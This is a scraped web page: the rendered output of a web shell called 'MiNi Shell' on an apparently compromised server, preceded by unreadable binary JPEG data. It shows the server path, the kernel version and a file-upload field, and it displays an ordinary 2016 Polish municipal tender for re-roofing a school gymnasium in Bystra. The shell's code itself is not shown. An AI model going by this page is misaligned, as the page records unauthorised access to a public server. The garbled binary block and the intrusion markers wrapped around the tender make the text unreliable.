JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160427/47269-N-2016.html

<p class="kh_header"><b>Wilkowice: Wykonanie w systemie zaprojektuj i wykonaj zadania inwestycyjnego pn.  Modernizacja pokrycia dachowego w budynku Gimnazjum im. Juliana Fałata w Bystrej</b><br>
<b>Numer ogłoszenia: 47269 - 2016; data zamieszczenia: 27.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilkowice , ul. Wyzwolenia 25, 43-365 Wilkowice, woj. śląskie, tel. 33 4990077, faks 33 4990077 w. 420.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie w systemie zaprojektuj i wykonaj zadania inwestycyjnego pn.  Modernizacja pokrycia dachowego w budynku Gimnazjum im. Juliana Fałata w Bystrej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia opracowanie dokumentacji projektowej i wykonanie na jej podstawie wymiany pokrycia dachu wraz z remontem sal lekcyjnych na II kondygnacji budynku gimnazjum im. J. Fałata w Bystrej:
W zakres prac wchodzą:
- opracowanie dokumentacji projektowej, zatwierdzonej przez Zamawiającego, na podstawie której Wykonawca w odpowiedniej instytucji zgłosi rozpoczęcie robót budowlanych
- wymiana pokrycia dachowego- mająca na celu prawidłowe zaizolowanie obecnych nieszczelności . 
Nie zmieni się architektura obiektu.
Zmianie ulegnie kolorystyka oraz materiał pokrycia dachu.
Materiałem tym będzie blacha aluminiowa łączona na rąbek stojący na pełnym deskowaniu, dodatkowo uszczelniana na rąbkach w kolorze analogicznym do koloru w wyremontowanej części obiektu.
Blacha z powlekanego aluminium , gr. 0,7 mm, dwuwarstwowo lakierowana proszkowo na kolor analogiczny jak na wyremontowanej części obiektu, ciężar  blachy nie większy niż 2,2 kg/m2.
W celu dodatkowego zabezpieczenia należy wykonać paroizolację systemową montowaną na pełne deskowanie.
Wielkość dachu w poziomym obrysie wynosi 35,15 m na 8,63 m.
Dach jest kolebkowy o promieniu 4,3 m.
Wysokość kolebki to 4 m.
W zakres zamówienia wchodzi również przykrycie klatek schodowych, o dachach w kształcie stożka o promieniu 1,4 m i wysokości 2,2 m.
Całość pokrycia dachu do wymiany to 450,65 m2.
Rynny oraz rury spustowe należy wykonać jako systemowe aluminiowe ze szczególną uwagą na konieczność  uzyskania szczelności oraz minimalnych spadków.
Istniejącą instalację systemów grzewczych należy odtworzyć w projektowanych rynnach.
Należy podłączyć istniejącą instalację odgromową do nowej połaci złączami systemowymi.
Dodatkowo dach należy wyposażyć w niezbędne elementy takie jak płotki śniegowe oraz stopnie kominiarskie  ( analogicznie jak w wyremontowanej części obiektu).
Izolację z wełny mineralnej w miejscach jej nadmiernego zawilgocenia należy wymienić oraz uzupełnić w brakujących miejscach.
Szczególną uwagę należy zwrócić na przestrzeń wykuszy okiennych.
- montaż schodów strychowych na nieużytkowane poddasze na 2 klatkach schodowych - wymagane schody w klasie odporności EI 30,wymiar w świetle min. 80 cm, umożliwiające zamknięcie i zabezpieczenie przed dostępem na nieużytkowaną część poddasza.
- demontaż istniejących świetlików w korytarzach i toaletach oraz montaż  lamp o natężeniu światła odpowiednim do wielkości pomieszczenia,
- wymiana powierzchni na  II kondygnacji budynku wykonanych  z płyt kartonowo- gipsowych na płyty cementowe montowane na systemowym stelażu.
Wykonane powierzchnie należy zaszpachlować , zagruntować oraz pomalować na kolor uzgodniony z zarządcą szkoły.
Pozostałe powierzchnie ścienne i sufitowe II kondygnacji budynku należy odpowiednio przygotować, uzupełnić ubytki , zgruntować i pomalować na kolor uzgodniony z zarządcą obiektu.
2. Przedmiot zamówienia ma zostać wykonany na podstawie załączonej do postępowania o udzielenie zamówienia publicznego dokumentacji: Dokumentacji przetargowej wymiany pokrycia dachu wraz z przebudową wentylacji w gimnazjum im. Juliana Fałata w Bystrej. Zakres opracowania obejmuje  dodatkowo wykonanie dokumentacji projektowej i wykonanie na jej podstawie przebudowy wentylacji. Przedmiot zamówienia nie obejmuje tego zakresu opracowania, będzie on przedmiotem innego postępowania przetargowego zrealizowanego w późniejszym terminie. 
3. Zamawiający zastrzega obowiązek osobistego wykonania kluczowej części zamówienia na roboty budowlane związanej z wykonaniem pokrycia dachowego. 
4. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 8 do Wniosku o dopuszczenie do udziału w postępowaniu - Program funkcjonalno-użytkowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.11.00-9, 45.11.12.20-6, 45.20.00.00-9, 45.40.00.00-1, 45.44.21.00-8, 45.45.00.00-6, 71.00.00.00-8, 71.20.00.00-0, 71.30.00.00-1, 71.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują wykonanie, tj. zakończenie w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch robót budowlanych odpowiadających przedmiotowi zamówienia tj. polegających na pokryciu dachu blachą na rąbek stojący o pow. nie mniejszej niż 450 m2, na które to roboty budowlane wykonawca udzielił min. 5 lat gwarancji. Zamawiający uzna warunek za spełniony jeżeli jeden Wykonawca wykaże się wykonaniem min. 2 robót. W sytuacji jeśli Wykonawca korzysta z wiedzy i doświadczenia podmiotu trzeciego, Zamawiający uzna warunek za spełniony jeżeli min. 2 roboty budowlane odpowiadające przedmiotowi zamówienia wykonane zostały przez jeden podmiot trzeci.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują dysponowanie osobą, która będzie uczestniczyć w wykonywaniu przedmiotu zamówienia w szczególności odpowiedzialną za kierowanie robotami budowlanymi /jako kierownik budowy/, posiadającą uprawnienia do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego w specjalności konstrukcyjno-budowlanej oraz posiadającą doświadczenie polegające na pełnieniu obowiązków kierownika budowy na min. dwóch robotach budowlanych polegających na pokryciu dachu blachą na rąbek stojący o pow. nie mniejszej niż 450 m2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami należy złożyć w formie pisemnej w języku polskim, 2. Oświadczenie dotyczące zasobów podmiotów trzecich, 3. pisemne zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów /osób zdolnych do wykonania zamówienia lub/i wiedzy i doświadczenia/, na potrzeby wykonania przedmiotu zamówienia, jeżeli odpowiednio w wykazie osób lub/i w wykazie robót budowlanych, Wykonawca wskazał, że polega na zasobach innych podmiotów - jeśli dotyczy 4. pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy - jeśli dotyczy
2.	W przypadku, gdy wniosek o dopuszczenie do udziału w postępowaniu zawiera informacje, stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca winien w sposób nie budzący wątpliwości zastrzec, które z pośród zawartych we wniosku o dopuszczenie do udziału w postępowaniu informacji stanowią tajemnicę przedsiębiorstwa. Nie ujawnia się informacji stanowiących tajemnice przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca nie później niż w terminie składania wniosku o dopuszczenie do udziału w postępowaniu  zastrzegł, że nie mogą być one udostępnione, oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Zamawiający  zaprosi do złożenia oferty maksymalnie 5 wykonawców, którzy otrzymają największą łączną ilość punktów za spełnienie warunku udziału w postępowaniu dot. wiedzy i doświadczenia oraz warunku udziału w postępowaniu dot. osób zdolnych do wykonania zamówienia.
 I.dot. warunku wiedzy i doświadczenia 
1. Wykonawca, który udokumentuje wykonanie min. 2 robót budowlanych, spełniających wymagania określone w pkt III.3.2 ogłoszenia o zamówieniu - otrzyma 2 pkt. 
2. Zamawiający przyzna Wykonawcy dodatkowe punkty za każdą dodatkowo wykazaną robotę budowlaną odpowiadającą przedmiotowi zamówienia, realizowaną osobiście przez Wykonawcę lub w ramach konsorcjum - 1 pkt za każdą robotę. 
3. Wykonawca może wykazać maksymalnie 3 roboty dodatkowe odpowiadające przedmiotowi zamówienia. 
4. Zamawiający nie przyzna dodatkowych punktów Wykonawcy, który dla potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt III.3.2 ogłoszenia o zamówieniu korzystał z wiedzy i doświadczenia podmiotu trzeciego. 
5. Łączna liczba punków jaką może otrzymać Wykonawca za spełnienie warunku udziału w postępowaniu, o którym mowa w pkt III.3.2 wynosi 5 pkt.
 II. dot. warunku osób zdolnych do wykonania zamówienia 
1. Wykonawca, który udokumentuje dysponowanie osobą, która będzie uczestniczyć w wykonywaniu przedmiotu zamówienia, spełniającą wymagania określone w pkt III.3.4 ogłoszenia o zamówieniu - otrzyma 2 pkt. 
2. Łączna liczba punków jaką może otrzymać Wykonawca za spełnienie warunku udziału w postępowaniu, o którym mowa w pkt III.3.4 wynosi 2 pkt.
 III. Łączna liczba punktów jaką może otrzymać Wykonawca za spełnienie warunków udziału w postępowaniu wynosi 7 pkt.
W przypadku gdy liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, o kolejności zaproszenia do złożenia oferty decydować będzie data i godzina wpływu wniosku o dopuszczenie do udziału w przetargu.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Okres gwarancji/rękojmi za wady na przedmiot zamówienia - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian zostaną opisane w załączniku nr 1 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gw.wilkowice.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wilkowice ul. Wyzwolenia 25 43-365 Wilkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2016 godzina 13:00, miejsce: Urząd Gminy Wilkowice ul. Wyzwolenia 25 43-365 Wilkowice, parter, Biuro obsługi klienta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com